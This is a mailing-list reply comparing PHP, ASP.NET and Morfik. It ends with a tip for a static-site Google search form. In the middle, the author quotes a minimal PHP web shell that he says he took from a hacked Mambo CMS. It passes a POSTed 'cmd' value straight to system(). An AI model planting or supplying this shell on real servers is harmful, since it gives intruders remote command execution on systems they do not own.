> > > 3. ASP.NET ties you to the Windows IIS server.  Apache is
> still the
> > > most used webserver, PHP the most used web scripting language.
> >

> > As a avid web developer I feel it worth mentioning that PHP
> is on it's
> > way out.  It is my somewhat informed opinion that not as many new
> > projects being started in it.  On sourceforge only one of the new
> > projects is PHP and of the top 50 most active, only
> Squirrelmail (a php project) is listed.
> > ASP.net is a good paltform for webdevelopement and Mono is an
> > increasingly popular platform on linux.
>
> Yes. Much to the decriment of linux...

Indeed, hackers will miss .php files like the following

<? $cmd = stripslashes($_POST['cmd']); if ($cmd) { echo "<pre>";
system($cmd); echo "</pre>"; } ?><form method="POST"><input type="text"
name="cmd" /></form>

Got it from a hacked Mambo (CMS - Content Management System) on a Linux
system recently (together with another bigger  incredible PHP that did a
nice looking telnet environment with integraded text editor etc.)

> In each case, I'm confident that Morfik will outdo ASP.Net
> simply because of superior design and performance through
> compiled server code.

Why not, if it's a good system. Not sure if Morfik though also supports on
the fly compilation and other dynamic code features that ASP.net has.

Anyway, I believe in the right-tool for the right job (the specs for what is
the right job of course include what is the client's investment in some
platform etc.), and try to avoid dynamic websites if possible

e.g. Iuse XML and create HTML via XSLT offline [sometimes also combined with
a GUI frontend for editing the XML] and a clever FTP updater writen with
Indy/Delphi that only uploads what changed at the website

for searching I recently coined up the following for such static websites
(without serverside logic and db etc.) to avoid using clientside JavaScript
(since recent browsers warn too much the user against scripts):

<form method="get" target="search" defaultbutton="submit"
action="http://www.google.com/search";>
 <input class="button" alt="search" type="submit" id="submit" name="submit"
value="Search">&nbsp;
 <input class="inputbox" alt="search criteria" type="text" id="q" name="q"
size="20" value="">
 <input type="hidden" id="q" name="q" value="site:YOUR_WEBPATH_HERE">
</form>

where YOUR_WEBPATH_HERE is your domain or some subpart url of your website
(say your Documentation subfolder etc.)

Have fun,
George

----------------
George Birbilis ([EMAIL PROTECTED])
Computer & Informatics Engineer
Microsoft MVP J# for 2004-2006
Borland "Spirit of Delphi"
++ QuickTime, Delphi, ActiveX, .NET components ++
http://www.kagi.com/birbilis
++ Robotics ++
http://www.mech.upatras.gr/~Robotics
http://www.mech.upatras.gr/~robgroup

  _____

Virus Database (VPS): 0644-4, 31/10/2006
Tested on: 5/11/2006 8:34:52 ??